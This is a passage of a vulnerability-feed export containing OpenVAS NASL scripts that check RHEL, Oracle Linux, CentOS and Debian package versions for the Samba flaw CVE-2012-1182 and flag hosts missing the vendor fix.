'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba3x on Red Hat Enterprise Linux (v. 
5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:45", "description": "Oracle Linux Local Security Checks ELSA-2013-0506", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0506", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0506.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123695\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:21 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0506\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0506 - samba4 security, bug fix and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0506\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0506.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = 
\"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res 
= isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:23", "description": "The remote host is missing an update for the 'libsmbclient' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881179\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) 
compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:31", "description": "The remote host is missing an update for the 'samba3x' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for samba3x CESA-2012:0466 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba3x CESA-2012:0466 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881228\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0466\");\n script_name(\"CentOS Update for samba3x CESA-2012:0466 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"samba3x on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to 
share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", 
rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:42", "description": "The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2450-1 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71254", "href": "http://plugins.openvas.org/nasl.php?oid=71254", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2450_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2450-1 (samba)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\";\ntag_summary = \"The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202450-1\";\n\nif(description)\n{\n script_id(71254);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:56:34 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2450-1 (samba)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc-pdf\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-tools\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"smbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"swat\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-08T12:57:23", "description": "Check for the Version of libsmbclient", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:881194", "href": "http://plugins.openvas.org/nasl.php?oid=881194", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. 
After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"libsmbclient on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_id(881194);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security 